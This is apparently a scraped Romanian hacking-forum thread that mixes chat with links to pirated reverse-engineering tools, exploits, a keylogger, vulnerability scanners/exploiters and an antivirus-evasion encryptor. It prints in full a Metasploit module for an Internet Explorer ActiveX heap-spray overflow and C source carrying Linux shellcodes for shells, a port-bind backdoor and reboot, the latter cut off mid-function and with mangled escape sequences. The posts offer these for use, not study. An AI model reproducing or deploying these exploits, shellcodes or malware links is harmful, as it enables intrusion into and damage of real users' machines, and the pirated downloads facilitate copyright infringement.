darkking

pentru inceput scheme logice ok, vb. serios, iti recomand C++ sau Delphi.

Am testat eu si mi-a mers (win xp home all updates to date), dar inca nu am primit pe mail parola de la mess Edit: nu trimite pass, dar infecteaza win :

Compuware Driver Studio v3.2 (XP SP2 Updated) The Compuware DevPartner product line delivers superior value to application development and testing teams, complementing and enhancing Microsoft Visual Studio capabilities as well as Java. With solutions that help developers debug, analyze, test and tune applications, Compuware DevPartner offers award-winning technology that is a long-time friend of development shops. [url]http://www.4shared.com/file/3828268/12222782/ds32b2485part1.html[/url] [url]http://www.4shared.com/file/3829418/e152aa92/ds32b2485part2.html[/url] [url]http://www.4shared.com/file/3830363/7ce69562/ds32b2485part3.html[/url] [url]http://www.4shared.com/file/3840651/d2eb976/ds32b2485part4.html[/url] IDA Pro v5.0.0.879 Advanced IDA Pro is a Windows or Linux hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all. Just grab an evaluation version if you want a test drive. An executive summary is provided for the non-technical user. [url]http://www.4shared.com/file/3787130/804d5f8e/ipart1.html[/url] [url]http://www.4shared.com/file/3787781/1033ca61/ipart2.html[/url] Numega Smartcheck v6.03 NuMega BoundsChecker 6.2 and NuMega SmartCheck 6.2. Designed to accelerate the development of reliable Windows applications and components, BoundsChecker and SmartCheck are the industry's premier error detection and debugging tools. These new versions include enhancements designed to increase developer productivity and detect errors in applications developed for Windows 2000, Windows NT, Windows 98/95 and Windows CE. [url]http://www.4shared.com/file/3777432/ead86b98/smartcheck_v603.html[/url] hiew v7.10 http://www.4shared.com/file/3797139/c4f1ce9a/hiew_710_full.html Ollydbg v1.10 (Most Plugines & Scripts) http://www.4shared.com/file/3813237/6f4b3387/odbg110_diablo.html WinHex 13.3 http://www.4shared.com/file/3788279/c7d88c21/wh133.html

streamripper <= 1.61.25 win32 remote exploit [url]http://rapidshare.de/files/34872045/streamripper.txt[/url] MD5: 2141F8CABA389A2B74C960AD8076C74B

Microsoft Msjet40.dll Exploit For Asp [url]http://rapidshare.de/files/34871873/msjet40.dll_exploit.txt[/url] MD5: 81353E47A94E2E41B468E8C532E06673

Download: [url]http://www.megaupload.com/?d=U6IHBPL2[/url] Parola: profile

bine ai venit si spor la invatat si la "facut ceva p'aici"

Vulnerable: Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 require 'msf/core' module Msf class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', 'Description' => %q{ This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 3783 $', 'References' => [ [ 'OSVDB', '27110' ], [ 'BID', '19030' ], [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "x00", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] ], 'DefaultTarget' => 0)) end def autofilter false end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] # Randomize the javascript variable names var_buffer = Rex::Text.rand_text_alpha(rand(30)+2) var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) var_x = Rex::Text.rand_text_alpha(rand(30)+2) var_i = Rex::Text.rand_text_alpha(rand(30)+2) var_tic = Rex::Text.rand_text_alpha(rand(30)+2) var_toc = Rex::Text.rand_text_alpha(rand(30)+2) # Randomize HTML data html = Rex::Text.rand_text_alpha(rand(30)+2) # Build out the message content = %Q| <html> <head> <script> try { var #{var_unescape} = unescape ; var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ; var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ; while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ; var #{var_x} = new Array() ; for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) { #{var_x}[ #{var_i} ] = #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; } for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) { var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { } var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); } } catch( e ) { window.location = 'about:blank' ; } </script> </head> <body> #{html} </body> </html> | # Randomize the whitespace in the document content.gsub!(/s+/) do |s| len = rand(100)+2 set = "x09x20x0dx0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, content) end end end

Keylogger in C++ Credits: XoreDevelopmentStudios Download: [url]http://rapidshare.de/files/34741398/keylogger.rar[/url] MD5: 7878D285443DDBD4AABE007B04FE03E3

The new Nmap GUI will be a graphical frontend for the nmap network scanner. New users will prefer it for its ease of use. Experienced users will prefer it for its ability to organize results and store them for later analysis. [url]http://kent.dl.sourceforge.net/sourceforge/nmapgui/nmapgui-1.0.1-everthing_you_need.win.zip[/url] Size: 3.9 MB (include nmap)

LOL....asta e tare vb. lu' Fatality, chiar eram pe ganduri

XML Rpc scanner si exploiter This software is a powerful tool allowing you to scan hosts with XML-RPC vulnerability. You can choose passthru() or system() method. Scanner: [url]http://rapidshare.de/files/34152723/xml-rpc-scan-2006-2.zip[/url] MD5: 5DAFB2B9086283F3D300F091937C3FAB Exploiter: [url]http://rapidshare.de/files/34152766/xml-rpc-exploit-2006-2.zip[/url] MD5: 1B821A2E781A2540236946DBCD08F883

IIS-5 DAV Scanner and Exploiter for Windows 98/ME/NT/2000/XP Notes of Version 2006.2 by mescalin Introduction This software is a powerful tool allowing you to exploit, manage and control archive files in hosts with IIS-5 DAV vulnerability. Usually have a list os hosts ".txt" extension. ZIP and other formats are not supported. [url]http://rapidshare.de/files/34147875/iis5dav-scan-exploit-2006-2.zip[/url] MD5: 57EED3FB5BB3CDB06B82A53F0037969D

PHP Injection Scanner / Exploiter for Windows 98/ME/NT/2000/XP Notes of Version 2006.2 by mescalin Introduction This software is a powerful tool allowing you to scan hosts with any PHP vulnerability. usually have a list os hosts ".txt" extension. ZIP and other formats are not supported. Features * Highly sophisticated codes * More faster and simple * Many strings in database * Authenticity verification * Ability to recover physically damaged archives * Filter in url hosts (ex: http://www.site.com.br/subdir1/subdir2/) will be use ( www.site.com.br/ and /subdir1/subdir2/ ) [url]http://rapidshare.de/files/34003722/phpinjection-scan-exploit-2006-2.zip[/url] MD5: 328CF5A53DF01E5CB26936C9622889FC

rupe-i 'mufa' sau da-i la ficat pana nu mai poate.

Download: [url]http://rapidshare.de/files/27083222/iepsb.rar[/url] Passwd: warez-over.net vb 3.6 skins [url]http://rapidshare.de/files/30676060/All_Extremepixels_Vb_3.6.rar.html[/url]

edit: limbaj violent. eram cleste.

TAPiON engine was developed to avoid code detection (shellcode/whatever). The engine can create unique deciphering algorithm, encrypt the original data and decrypt it on the fly (while code executes). Features: * Decryption key based on randomly generated deciphering algorithm (attacker breakpoint insertion will cause invalid decryption) * Decryption based on CPU time (selected randomly) - anti emulator code * RDTSC / coprocessor instructions usage - anti emulator code * Random step of block xoring * Random step of key increasing * Random registers usage * Multiple instructions variants * Block swapping * Garbage engine (normal instructions / coprocessor instructions) * Block swapping * Random deciphering algorithm size * Multiple deciphering algorithm layers generation [url]http://rapidshare.de/files/33658085/tapion_pack01b.zip[/url] MD5: 1B24806D8325B543BB3474E0E32FC609

* Kurdish Security Advisory * Author : Botan * Script : Artmedic Links * Site : http://www.artmedic.de * Version : 5.0 * Risk : High * Class : Remote Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-27-artmedic-links.html Dork: "artmedic links 5.0" Exploit: [url]http://rapidshare.de/files/33657269/vulnerability_artmedic.pl[/url] MD5: 24A8FE8E1505D0E5274FC9B206042A61

ASP auditor v2 BETA Author david.kierznowski_at_gmail.com http://michaeldaw.org purpose: Look for common misconfigurations and information leaks in ASP.NET applications. This tool is based on H D Moore’s Dot Net Application Scanner Author: H D Moore URL: http://www.digitaloffense.net/index.html?section=TOOLS HDM thanks for the feedback. Changelog: * Combined code from Asp Auditor v1 BETA and HDM’s DNAScanner. * Version plugin allowing specific ASP.NET versioning. * Version brute force capabilities using JavaScript validate directories. * Check if global ASP.NET validate is being used. * Added brute force as option in usage() -usage $ ./asp-audit-latest.pl Usage: ./asp-audit-latest.pl [[url]http://target/app/file.aspx][/url] (opts) (opts) -bf brute force ASP.NET version using JS Validate directories. –example 1 $ ./asp-audit.pl [url]http://www.*hidden*/index.aspx[/url] [*] Sending initial probe request… [*] Sending path discovery request… [*] Sending ASP.NET validate discovery request… [*] Sending application trace request… [*] Sending null remoter service request… [ .NET Configuration Analysis ] Server -> Microsoft-IIS/6.0 Application -> / FilePath -> D:VirtualServers*hidden* ADNVersion -> 1.1.4322.2300 matches -> 1.1.4322.2300 Version 1.1 Post-SP1 (Windows Server 2003 SP1) Mar 2005 –example 2 $ ./asp-audit.pl [url]http://www.*hidden*/index.aspx[/url] -bf [*] Sending initial probe request… [*] Sending path discovery request… [*] Sending ASP.NET validate discovery request… [*] Sending application trace request… [*] Sending null remoter service request… [ .NET Configuration Analysis ] Server -> Microsoft-IIS/6.0 AppTrace -> LocalOnly Application -> / FilePath -> D:inetpub*hidden* ADNVersion -> 1.1.4322.2300 matches -> 1.1.4322.2300 Version 1.1 Post-SP1 (Windows Server 2003 SP1) Mar 2005 [*] Sending brute force discovery requests… Found -> /aspnet_client/system_web/1_1_4322 [url]http://michaeldaw.org/projects/asp-audit-latest.tar.gz[/url]

[url]http://rapidshare.de/files/33560823/ie_com.txt[/url] MD5: 21887D28458A1BC37F3916492ED36AA0

Tool for Linux , (*nix) .. it support pcc , sparc , mips , x86 procs , this tool injects shellcodes into linux environment and uses these shellcodes for exploit developing , maybe IDS detections or testing and other stuff .... [ SIGINT , SIGHUP , SIGABRT handlers added ] /* * Qnix <Qnix@bsdmail.org> * ENVT v0.01 * * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define VERSION "v0.1" #define MAX_SIZE 1024 #define SHSIZE 512 #define bash "/bin/bash" /* Prototype */ void getenvaddr(char *environment); void help(char *string); void setshenv(int shellcode); /****************** START OF SHELLCODES ******************/ char execve_binbash[] = "x31xc0" // xor %eax, %eax "x50" // push %eax "x68x2fx2fx73x68" // push $0x68732f2f "x68x2fx62x69x6e" // push $0x6e69622f "x89xe3" // mov %esp, %ebx "x50" // push %eax "x53" // push %ebx "x89xe1" // mov %esp, %ecx "x31xd2" // xor %edx, %edx "xb0x0b" // mov $0xb, %al "xcdx80"; // int $0x80 char execve_setuid_setgid_bb[] = "x6ax17" // push $0x17 "x58" // pop %eax "x31xdb" // xor %ebx, %ebx "xcdx80" // int $0x80 "x6ax2e" // push $0x2e "x58" // pop %eax "x53" // push %ebx "xcdx80" // int $0x80 "x31xd2" // xor %edx, %edx "x6ax0b" // push $0xb "x58" // pop %eax "x52" // push %edx "x68x2fx2fx73x68" // push $0x68732f2f "x68x2fx62x69x6e" // push $0x6e69622f "x89xe3" // mov %esp, %ebx "x52" // push %edx "x53" // push %ebx "x89xe1" // mov %esp, %ecx "xcdx80"; // int $0x80 char portbind_64713[] = /* socket(AF_INET, SOCK_STREAM, 0) */ "x6ax66" // push $0x66 "x58" // pop %eax "x6ax01" // push $0x1 "x5b" // pop %ebx "x99" // cltd "x52" // push %edx "x53" // push %ebx "x6ax02" // push $0x2 "x89xe1" // mov %esp,%ecx "xcdx80" // int $0x80 /* bind(s, server, sizeof(server)) */ "x52" // push %edx "x66x68xfcxc9" // pushw $0xc9fc // PORT = 64713 "x66x6ax02" // pushw $0x2 "x89xe1" // mov $esp,%ecx "x6ax10" // push $0x10 "x51" // push %ecx "x50" // push %eax "x89xe1" // mov %esp,%ecx "x89xc6" // mov %eax,%esi "x43" // inc %ebx "xb0x66" // mov $0x66,%al "xcdx80" // int $0x80 /* listen(s, anything) */ "xb0x66" // mov $0x66,%al "xd1xe3" // shl %ebx "xcdx80" // int $0x80 /* accept(s, 0, 0) */ "x52" // push %edx "x56" // push %esi "x89xe1" // mov %esp,%ecx "x43" // inc %ebx "xb0x66" // mov $0x66,%al "xcdx80" // int $0x80 "x93" // xchg %eax,%ebx /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ "x6ax02" // push $0x2 "x59" // pop %ecx "xb0x3f" // mov $0x3f,%al "xcdx80" // int $0x80 "x49" // dec %ecx "x79xf9" // jns dup_loop /* execve("/bin/sh", ["/bin/sh"], NULL) */ "x6ax0b" // push $0xb "x58" // pop %eax "x52" // push %edx "x68x2fx2fx73x68" // push $0x68732f2f "x68x2fx62x69x6e" // push $0x6e69622f "x89xe3" // mov %esp, %ebx "x52" // push %edx "x53" // push %ebx "x89xe1" // mov %esp, %ecx "xcdx80"; // int $0x80 char reboot_20[] = "x6ax58" // push $0x58 "x58" // pop %eax "xbbxadxdexe1xfe" // mov $0xfee1dead,%ebx "xb9x69x19x12x28" // mov $0x28121969,%ecx "xbax67x45x23x01" // mov $0x1234567,%edx "xcdx80"; // int $0x80 char sparc_portbind[]= "x9dxe3xbfx78" // save %sp, -136, %sp "x90x10x20x02" // mov 2, %o0 "x92x10x20x01" // mov 1, %o1 "x94x22x80x0a" // sub %o2, %o2, %o2 "xd0x23xa0x44" // st %o0, [ %sp + 0x44 ] "xd2x23xa0x48" // st %o1, [ %sp + 0x48 ] "xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ] "x90x10x20x01" // mov 1, %o0 "x92x03xa0x44" // add %sp, 0x44, %o1 "x82x10x20xce" // mov 0xce, %g1 "x91xd0x20x10" // ta 0x10 "xd0x27xbfxf4" // st %o0, [ %fp + -12 ] "x90x10x20x02" // mov 2, %o0 "xd0x37xbfxd8" // sth %o0, [ %fp + -40 ] "x13x08xc8xc8" // sethi %hi(0x23232000), %o1 "x90x12x63x0f" // or %o1, 0x30f, %o0 "xd0x37xbfxda" // sth %o0, [ %fp + -38 ] "xc0x27xbfxdc" // clr [ %fp + -36 ] "x92x07xbfxd8" // add %fp, -40, %o1 "xd0x07xbfxf4" // ld [ %fp + -12 ], %o0 "x94x10x20x10" // mov 0x10, %o2 "xd0x23xa0x44" // st %o0, [ %sp + 0x44 ] "xd2x23xa0x48" // st %o1, [ %sp + 0x48 ] "xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ] "x90x10x20x02" // mov 2, %o0 "x92x03xa0x44" // add %sp, 0x44, %o1 "x82x10x20xce" // mov 0xce, %g1 "x91xd0x20x10" // ta 0x10 "xd0x07xbfxf4" // ld [ %fp + -12 ], %o0 "x92x10x20x05" // mov 5, %o1 "xd0x23xa0x44" // st %o0, [ %sp + 0x44 ] "xd2x23xa0x48" // st %o1, [ %sp + 0x48 ] "x90x10x20x04" // mov 4, %o0 "x92x03xa0x44" // add %sp, 0x44, %o1 "x82x10x20xce" // mov 0xce, %g1 "x91xd0x20x10" // ta 0x10 "x92x07xbfxd8" // add %fp, -40, %o1 "x94x07xbfxec" // add %fp, -20, %o2 "xd0x07xbfxf4" // ld [ %fp + -12 ], %o0 "xd0x23xa0x44" // st %o0, [ %sp + 0x44 ] "xd2x23xa0x48" // st %o1, [ %sp + 0x48 ] "xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ] "x90x10x20x05" // mov 5, %o0 "x92x03xa0x44" // add %sp, 0x44, %o1 "x82x10x20xce" // mov 0xce, %g1 "x91xd0x20x10" // ta 0x10 "xd0x27xbfxf0" // st %o0, [ %fp + -16 ] "xd0x07xbfxf0" // ld [ %fp + -16 ], %o0 "x92x22x40x09" // sub %o1, %o1, %o1 "x82x10x20x5a" // mov 0x5a, %g1 "x91xd0x20x10" // ta 0x10 "xd0x07xbfxf0" // ld [ %fp + -16 ], %o0 "x92x10x20x01" // mov 1, %o1 "x82x10x20x5a" // mov 0x5a, %g1 "x91xd0x20x10" // ta 0x10 "xd0x07xbfxf0" // ld [ %fp + -16 ], %o0 "x92x10x20x02" // mov 2, %o1 "x82x10x20x5a" // mov 0x5a, %g1 "x91xd0x20x10" // ta 0x10 "x2dx0bxd8x9a" // sethi %hi(0x2f626800), %l6 "xacx15xa1x6e" // or %l6, 0x16e, %l6 "x2fx0bxdcxda" // sethi %hi(0x2f736800), %l7 "x90x0bx80x0e" // and %sp, %sp, %o0 "x92x03xa0x08" // add %sp, 8, %o1 "x94x22x80x0a" // sub %o2, %o2, %o2 "x9cx03xa0x10" // add %sp, 0x10, %sp "xecx3bxbfxf0" // std %l6, [ %sp + -16 ] "xd0x23xbfxf8" // st %o0, [ %sp + -8 ] "xc0x23xbfxfc" // clr [ %sp + -4 ] "x82x10x20x3b" // mov 0x3b, %g1 "x91xd0x20x10"; // ta 0x10 char mips_sh[] = /* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */ "xffxffx10x04xabx0fx02x24" "x55xf0x46x20x66x06xffx23" "xc2xf9xecx23x66x06xbdx23" "x9axf9xacxafx9exf9xa6xaf" "x9axf9xbdx23x21x20x80x01" "x21x28xa0x03xccxcdx44x03" "/bin/sh"; char ppc_sh[] = "x7cx3fx0bx78" /*mr r31,r1*/ "x7cxa5x2ax79" /*xor. r5,r5,r5*/ "x42x40xffxf9" /*bdzl+ 10000454<main>*/ "x7fx08x02xa6" /*mflr r24*/ "x3bx18x01x34" /*addi r24,r24,308*/ "x98xb8xfexfb" /*stb r5,-261(r24)*/ "x38x78xfexf4" /*addi r3,r24,-268*/ "x90x61xffxf8" /*stw r3,-8(r1)*/ "x38x81xffxf8" /*addi r4,r1,-8*/ "x90xa1xffxfc" /*stw r5,-4(r1)*/ "x3bxc0x01x60" /*li r30,352*/ "x7fxc0x2ex70" /*srawi r0,r30,5*/ "x44xdexadxf2" /*.long 0x44deadf2*/ "/bin/shZ"; // the last byte becomes NULL /****************** END OF SHELLCODES ******************/ int main(int argc, char *argv[]) { int c; char buf1[MAX_SIZE]; char *addr = getenv("ENVT"); int buf1i; extern char *optarg; extern int optind, optopt; if(addr != NULL) { getenvaddr(addr); exit(0); } if(argc < 2) { help(argv[0]); } while((c = getopt(argc, argv, ":s:lhv")) != -1) { switch© { case 'v': version(); break; case 'h': help(argv[0]); case 'l': shellcode_list(); break; case 's': strncpy(buf1,optarg,MAX_SIZE-1); buf1i = atoi(buf1); setshenv(buf1i); break; case ':': fprintf(stderr,"Option -%c requires an operandn",optopt); break; } } return(0); } /* * Display version . * * */ int version() { fprintf(stdout,"ENVT %sn",VERSION); fprintf(stdout,"Coded by Qnix <Qnix@bsdmail.org>n"); exit(0); } /* * Display help . * * */ void getenvaddr(char *environment) { fprintf(stdout,"SHELLCODE FOUND IN %pn",environment); } void help(char *string) { fprintf(stderr,"Usage : %sn-l:(shellcode-list)n-s:<shellcode-number>n-h:(help)n-v:(version)n",string); exit(0); } /* * Display shellcode list . * * */ int shellcode_list() { fprintf(stdout,"nttt::[ LINUX/x86 ]::n"); fprintf(stdout,"1) linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn"); fprintf(stdout,"2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytesn"); fprintf(stdout,"3) linux/x86 portbind (port 64713) 86 bytesn"); fprintf(stdout,"4) linux/x86 reboot() - 20 bytesnn"); fprintf(stdout,"ttt::[ LINUX/SPARC ]::n"); fprintf(stdout,"5) linux/SPARC portbind port 8975 284 bytesnn"); fprintf(stdout,"ttt::[ LINUX/MIPS ]::n"); fprintf(stdout,"6) linux/mips execve /bin/sh 56 bytesnn"); fprintf(stdout,"ttt::[ LINUX/PPC ]::n"); fprintf(stdout,"7) linux/ppc execve /bin/sh 60 bytesnn"); exit(0); } /* * Set Shellcode in environment . * * */ void setshenv(int shellcode) { char *addr = getenv("ENVT"); // Use to get shellcode addr char execvebb[sHSIZE]; // Use for shellcode(1) char setugbb[sHSIZE]; // Use for shellcode(2) char portbind[sHSIZE]; // Use for shellcode(3) char reboot[sHSIZE]; // Use for shellcode(4) char sparc1[sHSIZE]; // Use for shellcode(5) char mips1[sHSIZE]; // Use for shellcode(6) char ppc1[sHSIZE]; // Use for shellcode(7) if(shellcode >= 8) { fprintf(stderr,"Error : shellcode number %d unavailable type -l to viewnthe available shellcodes.n",shellcode); exit(0); } /* Shellcode number 1 */ if(shellcode == 1) { fprintf(stdout,"Shellcode: Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn"); fprintf(stdout,"[+]t Setting memory for the shellcode .n"); memset(execvebb,0x90,SHSIZE); fprintf(stdout,"[+]t Copying shellcode to memory .n"); memcpy(&execvebb[sHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash)); memcpy(execvebb,"ENVT=",5); fprintf(stdout,"[+]t Putting shellcode in the environment .n"); putenv(execvebb); fprintf(stdout,"[+]t Going into the environment (ENVT) and exiting ....nDone %d bytes loaded to (ENVT)n",strlen(execve_binbash)); execl(bash, bash, '

salut si bine ai venit

Firepass - is a tunneling tool, allowing to bypass firewall restrictions and encapsulate data flows inside legal ones to use HTTP POST requests. TCP or UDP based protocols may be tunneled with Firepass. For now, both - client and server parts are written in Perl and the server script acts as a CGI program. The Firepass key feature is that you may use several type of installation of the server part script in the external network. You do not need to bind any port on the external box. Firepass may also be usable for the reverse task, when the server script is located at the corporative web server and when client interact with it from the external network. Download | md5sum: 6e533e57ea5b4fc02dc0f6e851840bbd [url]http://gray-world.net/projects/firepass/firepass-1.1.2a.tar.gz[/url]

Ai facut o alegere buna, mai ales ca este vorba de viitorul tau. Ce pot sa-ti spun e sa-ti urez succes in viata so in ceea ce vrei sa faci si cum spunea si 0x90 nu merita sa risti.